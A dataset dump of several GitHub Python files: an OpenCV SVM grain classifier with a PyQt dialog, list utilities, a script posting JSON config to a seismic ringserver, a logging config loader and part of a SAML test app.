hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f88380005fdf72aec41b2332e31913dae1f756f6 | 7,742 | py | Python | src/operations/classification/svm.py | vmariiechko/python-image-processing | 5613440dc04140845600b8c37a2b28786d504815 | [
"MIT"
] | null | null | null | src/operations/classification/svm.py | vmariiechko/python-image-processing | 5613440dc04140845600b8c37a2b28786d504815 | [
"MIT"
] | null | null | null | src/operations/classification/svm.py | vmariiechko/python-image-processing | 5613440dc04140845600b8c37a2b28786d504815 | [
"MIT"
] | null | null | null | import matplotlib.pyplot as plt
from cv2 import (ml, imread, threshold, findContours, moments, contourArea, arcLength,
boundingRect, drawContours, cvtColor,
IMREAD_GRAYSCALE, TERM_CRITERIA_MAX_ITER, COLOR_GRAY2RGB)
from numpy import (array, matrix, ones, empty, delete, sqrt, pi,
vstack, hstack, concatenate, float32, int64)
from sklearn.metrics import accuracy_score, confusion_matrix, ConfusionMatrixDisplay
from PyQt5.QtWidgets import QDialog
from PyQt5.QtCore import QCoreApplication, QSize
from src.constants import RETRIEVAL_MODES, APPROXIMATION_MODES
from ..operation import Operation
from .svm_ui import SVMUI
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib import use
use("Qt5Agg")
class SVM(QDialog, Operation, SVMUI):
"""The SVM class implements a support vector machine classification."""
def __init__(self, parent):
"""
Create a new dialog window to perform SVM classification.
Get image data from :param:`parent`.
:param parent: The image to classificate
:type parent: :class:`image.Image`
"""
super().__init__()
self.init_ui(self)
self.img_data = parent.data.copy()
self.current_img_data = None
self.training_data = None
self.training_shape = None
self.training_labels = None
self.svm = ml.SVM_create()
self.svm_accuracy = None
self.rbtn_show_confusion_matrix.clicked.connect(self.update_cm)
self.train_SVM()
self.make_predictions()
self.__retranslate_ui()
self.update_img_preview()
def __retranslate_ui(self):
"""Set the text and titles of the widgets."""
_translate = QCoreApplication.translate
_window_title = "SVM Classification"
_svm_desc = "The SVM classifies objects belonging to the three classes: <b>rice, beans, lentils</b>"
_training_data = f"The training data has {self.training_shape[1]} features (properties) " \
f"and {self.training_shape[0]} examples"
_svm_accuracy = "Trained accuracy: " + str(self.svm_accuracy)
_objects_colors = "The objects classified as rice have green contours, " \
"beans have blue, and lentils have red ones"
self.setWindowTitle(_window_title)
self.label_svm_desc.setText(_translate(_window_title, _svm_desc))
self.label_training_data.setText(_translate(_window_title, _training_data))
self.label_svm_accuracy.setText(_translate(_window_title, _svm_accuracy))
self.label_objects_colors.setText(_translate(_window_title, _objects_colors))
def get_features(self, img_data):
"""Return vector of properties for all found objects in the image."""
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['Simple'])
features = empty((29, 0))
for contour in contours:
obj_moments = moments(contour)
moments_values = obj_moments.values()
moments_values = array(list(moments_values)).flatten().reshape(-1, 1)
area = contourArea(contour)
perimeter = arcLength(contour, True)
_, _, width, height = boundingRect(contour)
aspect_ratio = float(width) / height
rect_area = width * height
extent = float(area) / rect_area
equivalent_diameter = sqrt(4 * area / pi)
feature_vector = array([area, perimeter, aspect_ratio, extent, equivalent_diameter]).reshape(-1, 1)
feature_vector = vstack((moments_values, feature_vector))
features = hstack((features, feature_vector))
return features
def get_labels(self, input_features, label_class=1):
"""Return the vector of labeled properties."""
shape = input_features.shape
out = ones((shape[1], 1))
return out * label_class
def update_training_data(self):
"""Calculate properties and labels of training data."""
img = imread('icons/SVM_train_data/train_ryz.jpg', IMREAD_GRAYSCALE)
features1 = self.get_features(img)
features1 = delete(features1, features1.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_soczewica.jpg', IMREAD_GRAYSCALE)
features2 = self.get_features(img)
features2 = delete(features2, features2.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_fasola.jpg', IMREAD_GRAYSCALE)
features3 = self.get_features(img)
features3 = delete(features3, features3.shape[1] - 1, axis=1)
self.training_data = float32(
concatenate((features1, concatenate((features2, features3), axis=1)), axis=1).transpose()
)
self.training_shape = self.training_data.shape
label1 = self.get_labels(features1, 1)
label2 = self.get_labels(features2, 2)
label3 = self.get_labels(features3, 3)
self.training_labels = int64(concatenate((label1, concatenate((label2, label3)))))
def train_SVM(self):
"""Train the SVM on calculated training data."""
self.update_training_data()
self.svm.setType(ml.SVM_C_SVC)
self.svm.setKernel(ml.SVM_LINEAR)
self.svm.setTermCriteria((TERM_CRITERIA_MAX_ITER, 1000, 1e-6))
self.svm.train(self.training_data, ml.ROW_SAMPLE, self.training_labels)
self.update_svm_accuracy()
def update_svm_accuracy(self):
"""Calculate SVM accuracy and confusion matrix."""
prediction = self.svm.predict(self.training_data)[1]
self.svm_accuracy = accuracy_score(self.training_labels, prediction)
self.cm_display = ConfusionMatrixDisplay(confusion_matrix(self.training_labels, prediction),
display_labels=['rice', 'lentils', 'beans'])
self.cm_display.plot()
self.cm_canvas = FigureCanvas(plt.gcf())
self.layout_preview.addWidget(self.cm_canvas)
self.cm_canvas.draw()
self.cm_canvas.setVisible(False)
def make_predictions(self):
"""Predict object classification."""
img_data = self.img_data.copy()
features = self.get_features(img_data)
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['None'])
img_data = cvtColor(img_data, COLOR_GRAY2RGB)
for i in range(len(contours)):
feature_predict = float32(features[:, i].reshape(-1, 1).transpose())
response = self.svm.predict(feature_predict)[1]
contour = contours[i]
if response == 1:
drawContours(img_data, [contour], 0, (0, 255, 0), 3)
elif response == 2:
drawContours(img_data, [contour], 0, (0, 0, 255), 3)
elif response == 3:
drawContours(img_data, [contour], 0, (255, 0, 0), 3)
else:
drawContours(img_data, [contour], 0, (255, 255, 255), 3)
self.current_img_data = img_data
def update_cm(self):
"""Update confusion matrix canvas visibility whenever :attr:`rbtn_show_confusion_matrix` clicked."""
if self.rbtn_show_confusion_matrix.isChecked():
self.cm_canvas.setVisible(True)
self.resize(self.layout.sizeHint() + QSize(self.cm_canvas.size().width(), 0))
else:
self.cm_canvas.setVisible(False)
self.resize(self.layout.sizeHint() - QSize(self.cm_canvas.size().width(), 0))
self.adjustSize()
| 40.322917 | 111 | 0.652803 | import matplotlib.pyplot as plt
from cv2 import (ml, imread, threshold, findContours, moments, contourArea, arcLength,
boundingRect, drawContours, cvtColor,
IMREAD_GRAYSCALE, TERM_CRITERIA_MAX_ITER, COLOR_GRAY2RGB)
from numpy import (array, matrix, ones, empty, delete, sqrt, pi,
vstack, hstack, concatenate, float32, int64)
from sklearn.metrics import accuracy_score, confusion_matrix, ConfusionMatrixDisplay
from PyQt5.QtWidgets import QDialog
from PyQt5.QtCore import QCoreApplication, QSize
from src.constants import RETRIEVAL_MODES, APPROXIMATION_MODES
from ..operation import Operation
from .svm_ui import SVMUI
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib import use
use("Qt5Agg")
class SVM(QDialog, Operation, SVMUI):
"""The SVM class implements a support vector machine classification."""
def __init__(self, parent):
"""
Create a new dialog window to perform SVM classification.
Get image data from :param:`parent`.
:param parent: The image to classificate
:type parent: :class:`image.Image`
"""
super().__init__()
self.init_ui(self)
self.img_data = parent.data.copy()
self.current_img_data = None
self.training_data = None
self.training_shape = None
self.training_labels = None
self.svm = ml.SVM_create()
self.svm_accuracy = None
self.rbtn_show_confusion_matrix.clicked.connect(self.update_cm)
self.train_SVM()
self.make_predictions()
self.__retranslate_ui()
self.update_img_preview()
def __retranslate_ui(self):
"""Set the text and titles of the widgets."""
_translate = QCoreApplication.translate
_window_title = "SVM Classification"
_svm_desc = "The SVM classifies objects belonging to the three classes: <b>rice, beans, lentils</b>"
_training_data = f"The training data has {self.training_shape[1]} features (properties) " \
f"and {self.training_shape[0]} examples"
_svm_accuracy = "Trained accuracy: " + str(self.svm_accuracy)
_objects_colors = "The objects classified as rice have green contours, " \
"beans have blue, and lentils have red ones"
self.setWindowTitle(_window_title)
self.label_svm_desc.setText(_translate(_window_title, _svm_desc))
self.label_training_data.setText(_translate(_window_title, _training_data))
self.label_svm_accuracy.setText(_translate(_window_title, _svm_accuracy))
self.label_objects_colors.setText(_translate(_window_title, _objects_colors))
def get_features(self, img_data):
"""Return vector of properties for all found objects in the image."""
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['Simple'])
features = empty((29, 0))
for contour in contours:
obj_moments = moments(contour)
moments_values = obj_moments.values()
moments_values = array(list(moments_values)).flatten().reshape(-1, 1)
area = contourArea(contour)
perimeter = arcLength(contour, True)
_, _, width, height = boundingRect(contour)
aspect_ratio = float(width) / height
rect_area = width * height
extent = float(area) / rect_area
equivalent_diameter = sqrt(4 * area / pi)
feature_vector = array([area, perimeter, aspect_ratio, extent, equivalent_diameter]).reshape(-1, 1)
feature_vector = vstack((moments_values, feature_vector))
features = hstack((features, feature_vector))
return features
def get_labels(self, input_features, label_class=1):
"""Return the vector of labeled properties."""
shape = input_features.shape
out = ones((shape[1], 1))
return out * label_class
def update_training_data(self):
"""Calculate properties and labels of training data."""
img = imread('icons/SVM_train_data/train_ryz.jpg', IMREAD_GRAYSCALE)
features1 = self.get_features(img)
features1 = delete(features1, features1.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_soczewica.jpg', IMREAD_GRAYSCALE)
features2 = self.get_features(img)
features2 = delete(features2, features2.shape[1] - 1, axis=1)
img = imread('icons/SVM_train_data/train_fasola.jpg', IMREAD_GRAYSCALE)
features3 = self.get_features(img)
features3 = delete(features3, features3.shape[1] - 1, axis=1)
self.training_data = float32(
concatenate((features1, concatenate((features2, features3), axis=1)), axis=1).transpose()
)
self.training_shape = self.training_data.shape
label1 = self.get_labels(features1, 1)
label2 = self.get_labels(features2, 2)
label3 = self.get_labels(features3, 3)
self.training_labels = int64(concatenate((label1, concatenate((label2, label3)))))
def train_SVM(self):
"""Train the SVM on calculated training data."""
self.update_training_data()
self.svm.setType(ml.SVM_C_SVC)
self.svm.setKernel(ml.SVM_LINEAR)
self.svm.setTermCriteria((TERM_CRITERIA_MAX_ITER, 1000, 1e-6))
self.svm.train(self.training_data, ml.ROW_SAMPLE, self.training_labels)
self.update_svm_accuracy()
def update_svm_accuracy(self):
"""Calculate SVM accuracy and confusion matrix."""
prediction = self.svm.predict(self.training_data)[1]
self.svm_accuracy = accuracy_score(self.training_labels, prediction)
self.cm_display = ConfusionMatrixDisplay(confusion_matrix(self.training_labels, prediction),
display_labels=['rice', 'lentils', 'beans'])
self.cm_display.plot()
self.cm_canvas = FigureCanvas(plt.gcf())
self.layout_preview.addWidget(self.cm_canvas)
self.cm_canvas.draw()
self.cm_canvas.setVisible(False)
def make_predictions(self):
"""Predict object classification."""
img_data = self.img_data.copy()
features = self.get_features(img_data)
_, img_data = threshold(img_data, 127, 255, 0)
contours, _ = findContours(img_data, RETRIEVAL_MODES['List'], APPROXIMATION_MODES['None'])
img_data = cvtColor(img_data, COLOR_GRAY2RGB)
for i in range(len(contours)):
feature_predict = float32(features[:, i].reshape(-1, 1).transpose())
response = self.svm.predict(feature_predict)[1]
contour = contours[i]
if response == 1:
drawContours(img_data, [contour], 0, (0, 255, 0), 3)
elif response == 2:
drawContours(img_data, [contour], 0, (0, 0, 255), 3)
elif response == 3:
drawContours(img_data, [contour], 0, (255, 0, 0), 3)
else:
drawContours(img_data, [contour], 0, (255, 255, 255), 3)
self.current_img_data = img_data
def update_cm(self):
"""Update confusion matrix canvas visibility whenever :attr:`rbtn_show_confusion_matrix` clicked."""
if self.rbtn_show_confusion_matrix.isChecked():
self.cm_canvas.setVisible(True)
self.resize(self.layout.sizeHint() + QSize(self.cm_canvas.size().width(), 0))
else:
self.cm_canvas.setVisible(False)
self.resize(self.layout.sizeHint() - QSize(self.cm_canvas.size().width(), 0))
self.adjustSize()
| 0 | 0 | 0 |
f3f3e74dbdb66c3eeb72f5d95fff49cb5739f5aa | 3,505 | py | Python | ksb_homology/utils/utils.py | Edoldin/KSB_homology | fcdd848526bbb9ce39d0c38ffabe0d23d93f691b | [
"MIT"
] | null | null | null | ksb_homology/utils/utils.py | Edoldin/KSB_homology | fcdd848526bbb9ce39d0c38ffabe0d23d93f691b | [
"MIT"
] | null | null | null | ksb_homology/utils/utils.py | Edoldin/KSB_homology | fcdd848526bbb9ce39d0c38ffabe0d23d93f691b | [
"MIT"
] | null | null | null | from collections import deque
| 30.745614 | 123 | 0.532097 | from collections import deque
class Utils():
@staticmethod
def calculate_index( aiC_U_ajC, top, Udot ):
"""
Calculate Index
PARAMETERS
----------
aiC_U_ajC : :class:' set'
top : :class:' set'
Udot : :class:' set'
"""
index= {}
t = sorted(top)
u = sorted(Udot)
for v in aiC_U_ajC:
index[v] = (t.index(v)+u.index(v))%2 #interesante hacer optimización aquí
return index
@staticmethod
def make_vector(ones, length):
"""
makevector transforma la sucesion de números S(i)(1) = (x1,...,xk)en un vector de longitud
simplexsize(S(i)(0)) cuyas posicionesx1,...,xkvalen 1 y el resto de las posiciones valen 0.
PARAMETERS
----------
s : :class: 'iterable'
"""
return [True if k in ones else False for k in range(1,length+1)]
@staticmethod
def unmake_vector(v):
"""
unmakevector
PARAMETERS
----------
v : :class: 'iterable'
returns:
z
"""
unmaked=[]
for k in range(0,len(v)):
if v[k]:
unmaked.append(k+1)
return unmaked
@staticmethod
def isBiggerList(bigger, smaller, or_equal=False):
if len(bigger) != len(smaller):
return False
for k in range(len(bigger)-1, 0, -1):
if(bigger[k]!=smaller[k]):
return bigger[k]>smaller[k]
if(or_equal):
return True
return False
@staticmethod
def isSmallerList(smaller, bigger, or_equal=False):
Utils.isBiggerList(smaller, bigger, not or_equal)
return False
@staticmethod
def mixLists(bigger, smaller):
'''
bigger(1,2,3)
smaller=(4,5)
mix=(1,4,2,5,3)
'''
if not len(bigger) == len(smaller)+1:
return False
result=[]
for k in range(0,len(smaller)):
result.append(bigger[k])
result.append(smaller[k])
result.append(bigger[-1])
return result
@staticmethod
def ordered_union(priorityList,extension, at_the_begining):
resulting_list = deque(priorityList)
to_add=[x for x in extension if x not in priorityList]
if at_the_begining:
to_add.reverse()
resulting_list.extendleft(to_add)
else:
resulting_list.extend(to_add)
return list(resulting_list)
@staticmethod
def ordered_difference(priorityList,difference):
resulting_list = [x for x in priorityList if x not in difference]
return resulting_list
@staticmethod
def intersection(list1,list2):
resulting_list = [x for x in list1 if x in list2]
return resulting_list
'''def vectToWect(Si, X,ai,aic):
''
Si=(2,3,5,6) (ej)
''
vect_i=makeVector(Si)
aiUaic=ai.union(aic)
#wectj=vectj∗partial(aj∪ ̄aj(0), ̄aj(0))∗partial( aj ∪ aj(0 : 1), ̄aj(1))∗...∗partial(aj ∪ ̄aj, ̄aj(−1));
# * = producto de matrices? -> transponer los índices pares (?)
for aii, index in enumerate(aic):
vect_i=np.matmul(vect_i,X.get_partial(aiUaic, aii) if index%2==1 else np.transpose(X.get_partial(aiUaic, aii)))
return unmakevector(vect_i)'''
| 968 | 2,486 | 22 |
104572a8ccb0d0755cba08b5cf533bc06da49b4a | 12,012 | py | Python | python/configPoster.py | crotwell/dragrace | 2fdb009e9ca7e868e1435d3a38ac81a0b3698433 | [
"MIT"
] | 12 | 2018-11-27T16:18:16.000Z | 2020-01-10T03:17:26.000Z | python/configPoster.py | crotwell/dragrace | 2fdb009e9ca7e868e1435d3a38ac81a0b3698433 | [
"MIT"
] | null | null | null | python/configPoster.py | crotwell/dragrace | 2fdb009e9ca7e868e1435d3a38ac81a0b3698433 | [
"MIT"
] | 1 | 2019-04-12T18:34:22.000Z | 2019-04-12T18:34:22.000Z | import argparse
import asyncio
import json
import math
import random
import signal
import time
from datetime import datetime, timedelta
#from netifaces import interfaces, ifaddresses, AF_INET
import socket
import traceback
import configChecker
import filecmp
import shutil
import sys
import simpleDali
# #For Testing
# productionDirectory="./ConfigFiles"
# prepDir=productionDirectory + "/ConfigFileEdit"
# archiveDir=productionDirectory + "/ConfigFileArchive"
# deployDir=productionDirectory + "/Run/ConfigFile"
# For Production Run
productionDirectory="/home/geo/Production"
prepDir=productionDirectory + "/ConfigFileEdit"
archiveDir=productionDirectory + "/ConfigFileArchive"
deployDir=productionDirectory + "/Run/ConfigFile"
if __name__ == "__main__":
# execute only if run as a script
parser = argparse.ArgumentParser()
parser.add_argument("-t",
dest="tokenFile",
type=argparse.FileType('r'),
help="tokenfile, encoded on first line")
parser.add_argument("-i",
dest="interval",
type=int,
default=60,
help="send time interval in seconds")
args = parser.parse_args()
sender = SendConfig(args.interval, args.tokenFile)
signal.signal(signal.SIGINT, handleSignal)
signal.signal(signal.SIGTERM, handleSignal)
sender.run()
| 42 | 128 | 0.542791 | import argparse
import asyncio
import json
import math
import random
import signal
import time
from datetime import datetime, timedelta
#from netifaces import interfaces, ifaddresses, AF_INET
import socket
import traceback
import configChecker
import filecmp
import shutil
import sys
import simpleDali
# #For Testing
# productionDirectory="./ConfigFiles"
# prepDir=productionDirectory + "/ConfigFileEdit"
# archiveDir=productionDirectory + "/ConfigFileArchive"
# deployDir=productionDirectory + "/Run/ConfigFile"
# For Production Run
productionDirectory="/home/geo/Production"
prepDir=productionDirectory + "/ConfigFileEdit"
archiveDir=productionDirectory + "/ConfigFileArchive"
deployDir=productionDirectory + "/Run/ConfigFile"
class SendConfig:
def __init__(self, intervalSecs, tokenFile):
self.verbose = True
self.token = None
self.tokenFilename = None
if tokenFile is not None:
print("init tokenFile: {}, name: ".format(tokenFile, tokenFile.name))
self.tokenFilename = tokenFile.name
self.token = tokenFile.readline().strip()
self.net = "XX"
self.sta = self.getLocalHostname()[0:5].upper()
if self.verbose:
print("set station code to {}".format(self.sta))
self.interval = intervalSecs # sleep in seconds
#self.host = "129.252.35.36"
#self.port = 15003
self.host ="74.207.233.105"
self.port = 6382
self.uri = "ws://www.seis.sc.edu/dragracews/datalink"
self.programname="sendConfig"
self.username="dragrace"
self.processid=0
self.architecture="python"
self.daliUpload = None
self.keepGoing = True
def reloadToken(self):
if self.tokenFilename is not None:
with open(self.tokenFilename) as f:
self.token = f.readline().strip()
return self.token
def getLocalHostname(self):
hostname = socket.gethostname().split('.')[0]
return hostname.strip()
def exceptionHandler(self, loop, context):
if self.daliUpload is not None:
self.daliUpload.close()
self.daliUpload = None
print("oh noooooo, {}".format(context['message']));
async def authorize(self):
if self.token:
authResp = await self.daliUpload.auth(self.token)
if self.verbose:
print("auth: {}".format(authResp))
if authResp.type == 'ERROR':
print("AUTHORIZATION failed, quiting...")
self.keepGoing = False
raise Exception("AUTHORIZATION failed, {} {}".format(authResp.type, authResp.message))
async def initConnections(self, daliUpload):
if self.daliUpload is None:
# create a separate upload datalink
self.daliUpload = simpleDali.SocketDataLink(self.host, self.port)
#self.daliUpload = simpleDali.WebSocketDataLink(self.uri)
else:
self.daliUpload.reconnect()
#daliUpload.verbose = True
await self.authorize()
serverId = await self.daliUpload.id(self.programname, self.username, self.processid, self.architecture)
if self.verbose:
print("Connect Upload: {}".format(serverId))
return self.daliUpload
def run(self):
loop = asyncio.get_event_loop()
loop.set_exception_handler(self.exceptionHandler)
repeatException = False
while self.keepGoing:
try:
if self.token is not None and simpleDali.timeUntilExpireToken(self.token) < timedelta(0):
# maybe someone gave us a new one?
if self.verbose:
print("token expired, reloading")
self.reloadToken()
if self.token is not None and simpleDali.timeUntilExpireToken(self.token) < timedelta(0):
raise Exception("Expired token in {}...".format(self.tokenFilename))
if self.daliUpload is None or self.daliUpload.isClosed():
# first time or maybe something bad happened
initTask = loop.create_task(self.initConnections(self.daliUpload))
loop.run_until_complete(initTask)
if initTask.exception() is not None:
raise initTask.exception()
self.daliUpload = initTask.result()
starttime = simpleDali.utcnowWithTz()
oldfile=deployDir+"/config_deployed"
newfile=prepDir+"/config_new"
archivefile=archiveDir+"/config_deployed"
if(filecmp.cmp(oldfile,newfile)):
# Files are the same, no action required
noChange=True
print("Config file has not changed, sending anyway")
json_file=open(oldfile,'r')
contents=json_file.read()
jsonMessage=json.loads(contents)
json_file.close()
streamid = "{}.{}/ZMAXCFG".format(self.net, 'ZMAX')
hpdatastart = simpleDali.datetimeToHPTime(starttime)
hpdataend = simpleDali.datetimeToHPTime(starttime)
jsonSendTask = loop.create_task(self.daliUpload.writeJSON(streamid, hpdatastart, hpdataend, jsonMessage))
loop.run_until_complete(jsonSendTask)
if jsonSendTask.exception() is not None:
self.daliUpload.close()
if self.verbose:
print("Exception sending json: {}".format( jsonSendTask.exception()))
raise jsonSendTask.exception()
else:
response = jsonSendTask.result()
if self.verbose:
print("send config as {} as json, {}".format(streamid, response))
if response.type == 'ERROR' and response.message.startswith(simpleDali.NO_SOUP):
print("AUTHORIZATION failed, quiting...")
self.keepGoing = False
#keepGoing = False
if repeatException:
if self.verbose:
print("Recovered from repeat exception")
repeatException = False
else:
# Files are different, process the new one
noChange=False
json_file=open(newfile,'r')
goodConfig=configChecker.configSanityCheck(json_file)
json_file.close()
if(not goodConfig):
print("Config file fails ... re-posting old file")
json_file=open(oldfile,'r')
contents=json_file.read()
jsonMessage=json.loads(contents)
json_file.close()
streamid = "{}.{}/ZMAXCFG".format(self.net, 'ZMAX')
hpdatastart = simpleDali.datetimeToHPTime(starttime)
hpdataend = simpleDali.datetimeToHPTime(starttime)
jsonSendTask = loop.create_task(self.daliUpload.writeJSON(streamid, hpdatastart, hpdataend, jsonMessage))
loop.run_until_complete(jsonSendTask)
if jsonSendTask.exception() is not None:
self.daliUpload.close()
if self.verbose:
print("Exception sending json: {}".format( jsonSendTask.exception()))
raise jsonSendTask.exception()
else:
response = jsonSendTask.result()
if self.verbose:
print("send config as {} as json, {}".format(streamid, response))
if response.type == 'ERROR' and response.message.startswith(simpleDali.NO_SOUP):
print("AUTHORIZATION failed, quiting...")
self.keepGoing = False
#keepGoing = False
if repeatException:
if self.verbose:
print("Recovered from repeat exception")
repeatException = False
else:
#
# OK, archive the old config and post the new once
#
print("New Config File is OK ... making it official and posting to ringserver")
shutil.move(oldfile,archivefile+"_"+starttime.isoformat())
shutil.copy2(newfile,oldfile)
json_file=open(newfile,'r')
contents=json_file.read()
jsonMessage=json.loads(contents)
json_file.close()
streamid = "{}.{}/ZMAXCFG".format(self.net, 'ZMAX')
hpdatastart = simpleDali.datetimeToHPTime(starttime)
hpdataend = simpleDali.datetimeToHPTime(starttime)
jsonSendTask = loop.create_task(self.daliUpload.writeJSON(streamid, hpdatastart, hpdataend, jsonMessage))
loop.run_until_complete(jsonSendTask)
if jsonSendTask.exception() is not None:
self.daliUpload.close()
if self.verbose:
print("Exception sending json: {}".format( jsonSendTask.exception()))
raise jsonSendTask.exception()
else:
response = jsonSendTask.result()
if self.verbose:
print("send config as {} as json, {}".format(streamid, response))
if response.type == 'ERROR' and response.message.startswith(simpleDali.NO_SOUP):
print("AUTHORIZATION failed, quiting...")
self.keepGoing = False
#keepGoing = False
if repeatException:
if self.verbose:
print("Recovered from repeat exception")
repeatException = False
except Exception:
if self.daliUpload is not None:
self.daliUpload.close()
if not repeatException:
print(traceback.format_exc())
repeatException = True
sys.stdout.flush()
for tempSleep in range(self.interval):
# sleep for interval seconds, but check to see if we should
# quit once a second
if self.keepGoing:
time.sleep(1)
loop.run_until_complete(loop.create_task(self.daliUpload.close()))
loop.close()
# end run()
def handleSignal(sigNum, stackFrame):
print("############ handleSignal {} ############".format(sigNum))
global sender
if sender is not None and sender.keepGoing:
sender.keepGoing = False
else:
sys.exit(0)
if __name__ == "__main__":
# execute only if run as a script
parser = argparse.ArgumentParser()
parser.add_argument("-t",
dest="tokenFile",
type=argparse.FileType('r'),
help="tokenfile, encoded on first line")
parser.add_argument("-i",
dest="interval",
type=int,
default=60,
help="send time interval in seconds")
args = parser.parse_args()
sender = SendConfig(args.interval, args.tokenFile)
signal.signal(signal.SIGINT, handleSignal)
signal.signal(signal.SIGTERM, handleSignal)
sender.run()
| 10,349 | -4 | 234 |
bb1f0421abd7c4f41cf11d86404f6403f7af7587 | 832 | py | Python | pie/util.py | andrearommal/PIe | 1502423b5377c1162fbe4fa953af9abea7f8e56b | [
"Apache-2.0"
] | null | null | null | pie/util.py | andrearommal/PIe | 1502423b5377c1162fbe4fa953af9abea7f8e56b | [
"Apache-2.0"
] | null | null | null | pie/util.py | andrearommal/PIe | 1502423b5377c1162fbe4fa953af9abea7f8e56b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
util.py
Created by Ronak Shah on April 12, 2018.
Copyright (c) 2018 Northwell Health. All rights reserved.
"""
import json
import logging
import os
import sys
RESOURCE_FILE = os.getenv('PIE_RESOURCE_CONFIG', "pie_resources.json")
JSON_CONFIG = json.load(open(RESOURCE_FILE))
programs = JSON_CONFIG['programs']
genomes = JSON_CONFIG['genomes']
chr1_fingerprints = JSON_CONFIG['chr1_fingerprints']
keys = JSON_CONFIG['keys']
targets = JSON_CONFIG['targets']
config = JSON_CONFIG['config']
FORMAT = '%(asctime)-15s %(funcName)-8s %(levelname)s %(message)s'
OUT_HANDLAR = logging.StreamHandler(sys.stdout)
OUT_HANDLAR.setFormatter(logging.Formatter(FORMAT))
OUT_HANDLAR.setLevel(logging.INFO)
LOGGER = logging.getLogger('pie')
LOGGER.addHandler(OUT_HANDLAR)
LOGGER.setLevel(logging.INFO)
| 26.83871 | 70 | 0.772837 | #!/usr/bin/env python
# encoding: utf-8
"""
util.py
Created by Ronak Shah on April 12, 2018.
Copyright (c) 2018 Northwell Health. All rights reserved.
"""
import json
import logging
import os
import sys
RESOURCE_FILE = os.getenv('PIE_RESOURCE_CONFIG', "pie_resources.json")
JSON_CONFIG = json.load(open(RESOURCE_FILE))
programs = JSON_CONFIG['programs']
genomes = JSON_CONFIG['genomes']
chr1_fingerprints = JSON_CONFIG['chr1_fingerprints']
keys = JSON_CONFIG['keys']
targets = JSON_CONFIG['targets']
config = JSON_CONFIG['config']
FORMAT = '%(asctime)-15s %(funcName)-8s %(levelname)s %(message)s'
OUT_HANDLAR = logging.StreamHandler(sys.stdout)
OUT_HANDLAR.setFormatter(logging.Formatter(FORMAT))
OUT_HANDLAR.setLevel(logging.INFO)
LOGGER = logging.getLogger('pie')
LOGGER.addHandler(OUT_HANDLAR)
LOGGER.setLevel(logging.INFO)
| 0 | 0 | 0 |
2672c05fc5faec2576b9d7fe6a08752dbcc31a12 | 5,115 | py | Python | src/ventcat/app.py | rohe/verify_entcat | df6dc2be0abc4115273d0b20c14dc90f03cab98d | [
"Apache-2.0"
] | null | null | null | src/ventcat/app.py | rohe/verify_entcat | df6dc2be0abc4115273d0b20c14dc90f03cab98d | [
"Apache-2.0"
] | null | null | null | src/ventcat/app.py | rohe/verify_entcat | df6dc2be0abc4115273d0b20c14dc90f03cab98d | [
"Apache-2.0"
] | null | null | null | import json
import cherrypy
import logging
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from ventcat import conv_response, as_unicode
from ventcat import UnSupported
from ventcat.acs import ACS
from ventcat.response import Response, make_cookie
from ventcat.sso import SSO
logger = logging.getLogger(__name__)
BINDING_MAP = {'post': BINDING_HTTP_POST, 'redirect': BINDING_HTTP_REDIRECT}
| 35.520833 | 82 | 0.516129 | import json
import cherrypy
import logging
from saml2 import BINDING_HTTP_POST
from saml2 import BINDING_HTTP_REDIRECT
from ventcat import conv_response, as_unicode
from ventcat import UnSupported
from ventcat.acs import ACS
from ventcat.response import Response, make_cookie
from ventcat.sso import SSO
logger = logging.getLogger(__name__)
BINDING_MAP = {'post': BINDING_HTTP_POST, 'redirect': BINDING_HTTP_REDIRECT}
class Application():
def __init__(self, sp, cache, lookup, ec_sequence, ec_information,
res_db, sso_args, policy):
self.sp = sp
self.cache = cache
self.lookup = lookup
self.ec_sequence = ec_sequence
self.ec_information = ec_information
self.res_db = res_db
self.sso = dict(
[(e, SSO(s, cache=cache, **sso_args)) for e, s in sp.items()])
self.sso_args = sso_args
self.policy = policy
self.acs_handler = {}
for key, _sso in self.sso.items():
if key == '':
self.acs_handler[key] = ACS(_sso.sp, cache=self.cache,
lookup=self.lookup,
res_db=self.res_db,
policy=self.policy, ec_test='base')
else:
